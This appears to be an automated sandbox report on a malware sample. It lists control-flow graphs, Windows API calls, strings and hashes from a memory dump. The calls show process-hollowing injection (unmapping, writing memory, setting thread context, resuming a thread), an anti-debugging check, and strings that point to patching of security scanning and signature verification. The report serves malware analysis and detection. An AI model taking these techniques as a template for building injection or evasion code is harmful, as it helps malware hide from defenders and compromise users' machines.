                                                                                              control_flow_graph 6883 31d8d6e-31d8d73 6885 31d8d78-31d8d7d 6883->6885 6885->6885 6886 31d8d7f-31d8e66 call 31c4990 call 31c4860 call 31c49a0 call 31c46d4 call 31c47ec call 31c49a0 call 31c46d4 call 31d89d0 call 31c4860 call 31c49a0 call 31c46d4 call 31c47ec call 31c49a0 call 31c46d4 call 31d89d0 6885->6886 6917 31d8e6c-31d8f47 call 31c4860 call 31c49a0 call 31c46d4 call 31c47ec call 31c49a0 call 31c46d4 call 31d89d0 call 31c4860 call 31c49a0 call 31c46d4 call 31c47ec call 31c49a0 call 31c46d4 call 31d89d0 6886->6917 6918 31da8b7-31da921 call 31c4500 * 2 call 31c4c60 call 31c4500 call 31c44dc call 31c4500 * 2 6886->6918 6917->6918 6962 31d8f4d-31d9275 call 31c4860 call 31c49a0 call 31c46d4 call 31c47ec call 31c49a0 call 31c46d4 call 31d89d0 call 31c4860 call 31c49a0 call 31c46d4 call 31c47ec call 31c49a0 call 31c46d4 call 31d89d0 call 31c30d4 * 2 call 31c4860 call 31c49a0 call 31c46d4 call 31c47ec call 31c49a0 call 31c46d4 call 31d89d0 call 31c4860 call 31c49a0 call 31c46d4 call 31c47ec call 31c49a0 call 31c46d4 call 31d89d0 call 31c4860 call 31c49a0 call 31c46d4 call 31c47ec call 31c49a0 call 31c46d4 call 31d89d0 call 31c4860 call 31c49a0 call 31c46d4 call 31c47ec call 31c49a0 call 31c46d4 call 31d89d0 call 31c4860 call 31c49a0 call 31c46d4 call 31c47ec call 31c49a0 call 31c46d4 call 31d89d0 call 31c4de0 call 31c4df0 call 31d8788 6917->6962 7071 31d92e8-31d9609 call 31c4860 call 31c49a0 call 31c46d4 call 31c47ec call 31c49a0 call 31c46d4 call 31d89d0 call 31c46d4 * 2 call 31d89d0 call 31c4860 call 31c49a0 call 31c46d4 call 31c47ec call 31c49a0 call 31c46d4 call 31d89d0 call 31c4860 call 31c49a0 call 31c46d4 call 31c47ec call 31c49a0 call 31c46d4 call 31d89d0 call 31c2ee0 call 31c2f08 call 31c4860 call 31c49a0 call 31c46d4 call 31c47ec call 31c49a0 call 31c46d4 call 31d89d0 call 31c4860 call 31c49a0 call 31c46d4 call 31c47ec call 31c49a0 call 31c46d4 call 31d89d0 call 31c4860 call 31c49a0 call 31c46d4 call 31c47ec call 31c49a0 call 31c46d4 call 31d89d0 GetThreadContext 6962->7071 7072 31d9277-31d92e3 call 31c4860 call 31c49a0 call 31c46d4 call 31c47ec call 31c49a0 call 31c46d4 call 31d89d0 6962->7072 7071->6918 7180 31d960f-31d9872 call 31c4860 call 31c49a0 call 31c46d4 call 31c47ec call 31c49a0 call 31c46d4 call 31d89d0 call 31c4860 call 31c49a0 call 31c46d4 call 31c47ec call 31c49a0 call 31c46d4 call 31d89d0 call 31c4860 call 31c49a0 call 31c46d4 call 31c47ec call 31c49a0 call 31c46d4 call 31d89d0 call 31c4860 call 31c49a0 call 31c46d4 call 31c47ec call 31c49a0 call 31c46d4 call 31d89d0 call 31c4860 call 31c49a0 call 31c46d4 call 31c47ec call 31c49a0 call 31c46d4 call 31d89d0 call 31d8400 7071->7180 7072->7071 7253 31d9b7f-31d9beb call 31c4860 call 31c49a0 call 31c46d4 call 31c47ec call 31c49a0 call 31c46d4 call 31d89d0 7180->7253 7254 31d9878-31d99e1 call 31c4860 call 31c49a0 call 31c46d4 call 31c47ec call 31c49a0 call 31c46d4 call 31d89d0 call 31c4860 call 31c49a0 call 31c46d4 call 31c47ec call 31c49a0 call 31c46d4 call 31d89d0 call 31c4860 call 31c49a0 call 31c46d4 call 31c47ec call 31c49a0 call 31c46d4 call 31d89d0 call 31d8670 7180->7254 7281 31d9bf0-31d9d70 call 31c4860 call 31c49a0 call 31c46d4 call 31c47ec call 31c49a0 call 31c46d4 call 31d89d0 call 31c4860 call 31c49a0 call 31c46d4 call 31c47ec call 31c49a0 call 31c46d4 call 31d89d0 call 31c4860 call 31c49a0 call 31c46d4 call 31c47ec call 31c49a0 call 31c46d4 call 31d89d0 call 31d7a2c 7253->7281 7344 31d9a0b-31d9a77 call 31c4860 call 31c49a0 call 31c46d4 call 31c47ec call 31c49a0 call 31c46d4 call 31d89d0 7254->7344 7345 31d99e3-31d9a09 call 31d7a2c 7254->7345 7281->6918 7385 31d9d76-31d9e6f call 31c4860 call 31c49a0 call 31c46d4 call 31c47ec call 31c49a0 call 31c46d4 call 31d89d0 call 31c4860 call 31c49a0 call 31c46d4 call 31c47ec call 31c49a0 call 31c46d4 call 31d89d0 call 31d8c80 7281->7385 7352 31d9a7c-31d9b7d call 31c4860 call 31c49a0 call 31c46d4 call 31c47ec call 31c49a0 call 31c46d4 call 31d89d0 call 31c4860 call 31c49a0 call 31c46d4 call 31c47ec call 31c49a0 call 31c46d4 call 31d89d0 call 31d7a2c 7344->7352 7345->7352 7352->7281 7436 31d9e71-31d9ebe call 31d8b78 call 31d8b6c 7385->7436 7437 31d9ec3-31da8b2 call 31c4860 call 31c49a0 call 31c46d4 call 31c47ec call 31c49a0 call 31c46d4 call 31d89d0 call 31c4860 call 31c49a0 call 31c46d4 call 31c47ec call 31c49a0 call 31c46d4 call 31d89d0 call 31c4860 call 31c49a0 call 31c46d4 call 31c47ec call 31c49a0 call 31c46d4 call 31d89d0 call 31d7d78 call 31c4860 call 31c49a0 call 31c46d4 call 31c47ec call 31c49a0 call 31c46d4 call 31d89d0 call 31c4860 call 31c49a0 call 31c46d4 call 31c47ec call 31c49a0 call 31c46d4 call 31d89d0 call 31c4860 call 31c49a0 call 31c46d4 call 31c47ec call 31c49a0 call 31c46d4 call 31d89d0 call 31d7d78 call 31c4860 call 31c49a0 call 31c46d4 call 31c47ec call 31c49a0 call 31c46d4 call 31d89d0 call 31c4860 call 31c49a0 call 31c46d4 call 31c47ec call 31c49a0 call 31c46d4 call 31d89d0 call 31c4860 call 31c49a0 call 31c46d4 call 31c47ec call 31c49a0 call 31c46d4 call 31d89d0 SetThreadContext NtResumeThread call 31c4860 call 31c49a0 call 31c46d4 call 31c47ec call 31c49a0 call 31c46d4 call 31d89d0 call 31c4860 call 31c49a0 call 31c46d4 call 31c47ec call 31c49a0 call 31c46d4 call 31d89d0 call 31c4860 call 31c49a0 call 31c46d4 call 31c47ec call 31c49a0 call 31c46d4 call 31d89d0 call 31c4860 call 31c49a0 call 31c46d4 call 31c47ec call 31c49a0 call 31c46d4 call 31d89d0 call 31c2c2c call 31c4860 call 31c49a0 call 31c46d4 call 31c47ec call 31c49a0 call 31c46d4 call 31d89d0 call 31d894c * 3 call 31c4860 call 31c49a0 call 31c46d4 call 31c47ec call 31c49a0 call 31c46d4 call 31d89d0 call 31d894c * 2 call 31c4860 call 31c49a0 call 31c47ec call 31c49a0 call 31d894c call 31c4860 call 31c49a0 call 31c47ec call 31c49a0 call 31d894c * 5 call 31c4860 call 31c49a0 call 31c47ec call 31c49a0 call 31d894c call 31c4860 call 31c49a0 call 31c47ec call 31c49a0 call 31d894c call 31c4860 call 31c49a0 call 31c47ec call 31c49a0 call 31d894c call 31c4860 call 31c49a0 call 31c47ec call 31c49a0 call 31d894c call 31d8080 call 31d894c * 2 7385->7437 7436->7437 7437->6918
                                                                                              APIs
                                                                                                • Part of subcall function 031D89D0: FreeLibrary.KERNEL32(74AE0000,00000000,00000000,00000000,00000000,0324738C,Function_0000662C,00000004,0324739C,0324738C,05F5E103,00000040,032473A0,74AE0000,00000000,00000000), ref: 031D8AAA
                                                                                                • Part of subcall function 031D8788: CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 031D8814
                                                                                              • GetThreadContext.KERNEL32(0000089C,03247424,ScanString,032473A8,031DA93C,UacInitialize,032473A8,031DA93C,ScanBuffer,032473A8,031DA93C,ScanBuffer,032473A8,031DA93C,UacInitialize,032473A8), ref: 031D9602
                                                                                                • Part of subcall function 031D8400: NtReadVirtualMemory.NTDLL(?,?,?,?,?), ref: 031D8471
                                                                                                • Part of subcall function 031D8670: NtUnmapViewOfSection.NTDLL(?,?), ref: 031D86D5
                                                                                                • Part of subcall function 031D7A2C: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 031D7A9F
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1725304888.00000000031C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1725278060.00000000031C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1725659576.00000000031EE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.0000000003247000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.000000000333B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.000000000333E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_31c0000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: MemoryVirtual$AllocateContextCreateFreeLibraryProcessReadSectionThreadUnmapUserView
                                                                                              • String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$I_QueryTagInformation$Initialize$MiniDumpReadDumpStream$MiniDumpWriteDump$NtOpenObjectAuditAlarm$NtOpenProcess$NtReadVirtualMemory$NtSetSecurityObject$OpenSession$SLGetLicenseInformation$ScanBuffer$ScanString$UacInitialize$UacScan$advapi32$bcrypt$dbgcore$ntdll$sppc
                                                                                              • API String ID: 3386062106-51457883
                                                                                              • Opcode ID: 4b832500cbcb4570588aeb2a98ea4c3d143bb30cd73cf94f4af36b4e693206f6
                                                                                              • Instruction ID: 7458e346178a772d0656760dec84859f8210ea15a8c1682db5c6ceb67470a462
                                                                                              • Opcode Fuzzy Hash: 4b832500cbcb4570588aeb2a98ea4c3d143bb30cd73cf94f4af36b4e693206f6
                                                                                              • Instruction Fuzzy Hash: 48E21B38A142689FCB16FB65DC91BCEB3B9AF9D200F1041A5A055AF215DF30EE86CF51
                                                                                              Function 031C5ACC Relevance: 33.4, APIs: 17, Strings: 2, Instructions: 184registrystringlibraryCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 10945 31c5acc-31c5b0d GetModuleFileNameA RegOpenKeyExA 10946 31c5b4f-31c5b92 call 31c5908 RegQueryValueExA 10945->10946 10947 31c5b0f-31c5b2b RegOpenKeyExA 10945->10947 10954 31c5b94-31c5bb0 RegQueryValueExA 10946->10954 10955 31c5bb6-31c5bd0 RegCloseKey 10946->10955 10947->10946 10948 31c5b2d-31c5b49 RegOpenKeyExA 10947->10948 10948->10946 10950 31c5bd8-31c5c09 lstrcpynA GetThreadLocale GetLocaleInfoA 10948->10950 10952 31c5c0f-31c5c13 10950->10952 10953 31c5cf2-31c5cf9 10950->10953 10956 31c5c1f-31c5c35 lstrlenA 10952->10956 10957 31c5c15-31c5c19 10952->10957 10954->10955 10958 31c5bb2 10954->10958 10960 31c5c38-31c5c3b 10956->10960 10957->10953 10957->10956 10958->10955 10961 31c5c3d-31c5c45 10960->10961 10962 31c5c47-31c5c4f 10960->10962 10961->10962 10963 31c5c37 10961->10963 10962->10953 10964 31c5c55-31c5c5a 10962->10964 10963->10960 10965 31c5c5c-31c5c82 lstrcpynA LoadLibraryExA 10964->10965 10966 31c5c84-31c5c86 10964->10966 10965->10966 10966->10953 10967 31c5c88-31c5c8c 10966->10967 10967->10953 10968 31c5c8e-31c5cbe lstrcpynA LoadLibraryExA 10967->10968 10968->10953 10969 31c5cc0-31c5cf0 lstrcpynA LoadLibraryExA 10968->10969 10969->10953
                                                                                              APIs
                                                                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000105,031C0000,031EE790), ref: 031C5AE8
                                                                                              • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,031C0000,031EE790), ref: 031C5B06
                                                                                              • RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,031C0000,031EE790), ref: 031C5B24
                                                                                              • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 031C5B42
                                                                                              • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,031C5BD1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 031C5B8B
                                                                                              • RegQueryValueExA.ADVAPI32(?,031C5D38,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,031C5BD1,?,80000001), ref: 031C5BA9
                                                                                              • RegCloseKey.ADVAPI32(?,031C5BD8,00000000,?,?,00000000,031C5BD1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 031C5BCB
                                                                                              • lstrcpynA.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 031C5BE8
                                                                                              • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 031C5BF5
                                                                                              • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 031C5BFB
                                                                                              • lstrlenA.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 031C5C26
                                                                                              • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 031C5C6D
                                                                                              • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 031C5C7D
                                                                                              • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 031C5CA5
                                                                                              • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 031C5CB5
                                                                                              • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 031C5CDB
                                                                                              • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?), ref: 031C5CEB
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1725304888.00000000031C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1725278060.00000000031C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1725659576.00000000031EE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.0000000003247000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.000000000333B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.000000000333E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_31c0000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: lstrcpyn$LibraryLoadOpen$LocaleQueryValue$CloseFileInfoModuleNameThreadlstrlen
                                                                                              • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                                                                                              • API String ID: 1759228003-2375825460
                                                                                              • Opcode ID: 40e88b139ba3392031f3d24379ca56672c24dc662797eb2a123ab211e22c1256
                                                                                              • Instruction ID: 5d78f8f275f8bf5ab6c9aa4494f4e4a1c591181ab43a53246d591aa16e5a458d
                                                                                              • Opcode Fuzzy Hash: 40e88b139ba3392031f3d24379ca56672c24dc662797eb2a123ab211e22c1256
                                                                                              • Instruction Fuzzy Hash: 43511975A5038C7FEB21D6E48C46FEFBBAD8B1D740F5401A9AA00E6082D774EE448B64
                                                                                              Function 031D894C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 40libraryloaderCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 13205 31d894c-31d8971 LoadLibraryW 13206 31d89bb-31d89c1 13205->13206 13207 31d8973-31d898b GetProcAddress 13205->13207 13208 31d898d-31d89ac call 31d7d78 13207->13208 13209 31d89b0-31d89b6 FreeLibrary 13207->13209 13208->13209 13212 31d89ae 13208->13212 13209->13206 13212->13209
                                                                                              APIs
                                                                                              • LoadLibraryW.KERNEL32(bcrypt,?,0000089C,00000000,032473A8,031DA587,ScanString,032473A8,031DA93C,ScanBuffer,032473A8,031DA93C,Initialize,032473A8,031DA93C,UacScan), ref: 031D8960
                                                                                              • GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 031D897A
                                                                                              • FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,0000089C,00000000,032473A8,031DA587,ScanString,032473A8,031DA93C,ScanBuffer,032473A8,031DA93C,Initialize), ref: 031D89B6
                                                                                                • Part of subcall function 031D7D78: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 031D7DEC
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1725304888.00000000031C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1725278060.00000000031C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1725659576.00000000031EE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.0000000003247000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.000000000333B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.000000000333E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_31c0000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: Library$AddressFreeLoadMemoryProcVirtualWrite
                                                                                              • String ID: BCryptVerifySignature$bcrypt
                                                                                              • API String ID: 1002360270-4067648912
                                                                                              • Opcode ID: 62774bd1f197cc74897c5e3f9b2a7efe254c4761739e058e454944e54a18b9c4
                                                                                              • Instruction ID: 06c4ad8b4c82642ee281eb326bd2a625aac8e56c5b4a5efff63622b905aa33c8
                                                                                              • Opcode Fuzzy Hash: 62774bd1f197cc74897c5e3f9b2a7efe254c4761739e058e454944e54a18b9c4
                                                                                              • Instruction Fuzzy Hash: 45F0C2F96003546FD310FB6CBC8DF577F989799614F084529BD388B144E77028808B90
                                                                                              Function 031DF744 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 28libraryloaderCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 13222 31df744-31df75e GetModuleHandleW 13223 31df78a-31df792 13222->13223 13224 31df760-31df772 GetProcAddress 13222->13224 13224->13223 13225 31df774-31df784 CheckRemoteDebuggerPresent 13224->13225 13225->13223 13226 31df786 13225->13226 13226->13223
                                                                                              APIs
                                                                                              • GetModuleHandleW.KERNEL32(KernelBase), ref: 031DF754
                                                                                              • GetProcAddress.KERNEL32(00000000,CheckRemoteDebuggerPresent), ref: 031DF766
                                                                                              • CheckRemoteDebuggerPresent.KERNEL32(FFFFFFFF,?,00000000,CheckRemoteDebuggerPresent,KernelBase), ref: 031DF77D
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1725304888.00000000031C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1725278060.00000000031C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1725659576.00000000031EE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.0000000003247000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.000000000333B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.000000000333E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_31c0000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressCheckDebuggerHandleModulePresentProcRemote
                                                                                              • String ID: CheckRemoteDebuggerPresent$KernelBase
                                                                                              • API String ID: 35162468-539270669
                                                                                              • Opcode ID: 7e6f95d51c7fdd2d6954dd32d2e1b57890512403d8bb5bdbb8cbbaf4678f01be
                                                                                              • Instruction ID: ec25450cbf4c0a9630cdd3f2ab76ecb63d90e87eca1e95a0c250c3d6e7553b1b
                                                                                              • Opcode Fuzzy Hash: 7e6f95d51c7fdd2d6954dd32d2e1b57890512403d8bb5bdbb8cbbaf4678f01be
                                                                                              • Instruction Fuzzy Hash: 89F0A070904298BFDB10E6F888887DDFBA89B1E225F284394A436A61C2E7750785C6A1
                                                                                              Function 031DDD70 Relevance: 7.6, APIs: 5, Instructions: 80nativefileCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                                • Part of subcall function 031C4F20: SysAllocStringLen.OLEAUT32(?,?), ref: 031C4F2E
                                                                                              • RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,031DDE40), ref: 031DDDAB
                                                                                              • NtOpenFile.N(?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000,031DDE40), ref: 031DDDDB
                                                                                              • NtQueryInformationFile.N(?,?,?,00000018,00000005,?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000), ref: 031DDDF0
                                                                                              • NtReadFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?,00100001), ref: 031DDE1C
                                                                                              • NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?), ref: 031DDE25
                                                                                                • Part of subcall function 031C4C60: SysFreeString.OLEAUT32(031DF4A4), ref: 031C4C6E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1725304888.00000000031C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1725278060.00000000031C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1725659576.00000000031EE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.0000000003247000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.000000000333B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.000000000333E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_31c0000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: File$PathString$AllocCloseFreeInformationNameName_OpenQueryRead
                                                                                              • String ID:
                                                                                              • API String ID: 1897104825-0
                                                                                              • Opcode ID: a43fdb955202aac27b8ca7eafbf82ea7031f221eaab3bdb4a50a693b8774ea54
                                                                                              • Instruction ID: 614edaa1b4c7599aec5ab1eab7dec154e5afca6a9aa853780887663f52bfe84d
                                                                                              • Opcode Fuzzy Hash: a43fdb955202aac27b8ca7eafbf82ea7031f221eaab3bdb4a50a693b8774ea54
                                                                                              • Instruction Fuzzy Hash: 3021ED75A54308BBEB11EAA5DC52FDEB7BCAB4D700F500465B200EB180DBB4AA0487A5
                                                                                              Function 031DE4B8 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 111networkCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                              • InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 031DE5F6
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1725304888.00000000031C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1725278060.00000000031C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1725659576.00000000031EE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.0000000003247000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.000000000333B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.000000000333E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_31c0000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: CheckConnectionInternet
                                                                                              • String ID: Initialize$OpenSession$ScanBuffer
                                                                                              • API String ID: 3847983778-3852638603
                                                                                              • Opcode ID: ffd8dd9293dfc52c02f3efecce634a2ac3ccf4ad757bfedd5ea25ff59f2b0ab9
                                                                                              • Instruction ID: 0e40350171209835a30e1584ea9de7ef1d84140dc78ecfb72953ada7cee321dd
                                                                                              • Opcode Fuzzy Hash: ffd8dd9293dfc52c02f3efecce634a2ac3ccf4ad757bfedd5ea25ff59f2b0ab9
                                                                                              • Instruction Fuzzy Hash: 51413E39B2835C9FDB12EBA5D851ADEB3B9EF9D601F204429E040AF244DF30AD018B65
                                                                                              Function 031DDC8C Relevance: 6.1, APIs: 4, Instructions: 80nativefileCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                                • Part of subcall function 031C4F20: SysAllocStringLen.OLEAUT32(?,?), ref: 031C4F2E
                                                                                              • RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,031DDD5E), ref: 031DDCCB
                                                                                              • NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 031DDD05
                                                                                              • NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 031DDD32
                                                                                              • NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 031DDD3B
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1725304888.00000000031C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1725278060.00000000031C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1725659576.00000000031EE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.0000000003247000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.000000000333B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.000000000333E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_31c0000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: FilePath$AllocCloseCreateNameName_StringWrite
                                                                                              • String ID:
                                                                                              • API String ID: 3764614163-0
                                                                                              • Opcode ID: 0aa1a385cf9fef4e70948dce89cde1942910bd7840328dbb30c49d6133781403
                                                                                              • Instruction ID: f510d48d5e02fd40ec4b40f88dc42b41cf0885feac7d5c3d08c84d85cda48653
                                                                                              • Opcode Fuzzy Hash: 0aa1a385cf9fef4e70948dce89cde1942910bd7840328dbb30c49d6133781403
                                                                                              • Instruction Fuzzy Hash: 0B210C75A54308BFEB21EAA4DC52FEEB3BCDF09B00F614465B610FB1C0DBB06A048665
                                                                                              Function 031D8788 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 62processCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 031D81CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,031D823C,?,?,00000000,?,031D7A7E,ntdll,00000000,00000000,031D7AC3,?,?,00000000), ref: 031D820A
                                                                                                • Part of subcall function 031D81CC: GetModuleHandleA.KERNELBASE(?), ref: 031D821E
                                                                                                • Part of subcall function 031D8274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,031D82FC,?,?,00000000,00000000,?,031D8215,00000000,KernelBASE,00000000,00000000,031D823C), ref: 031D82C1
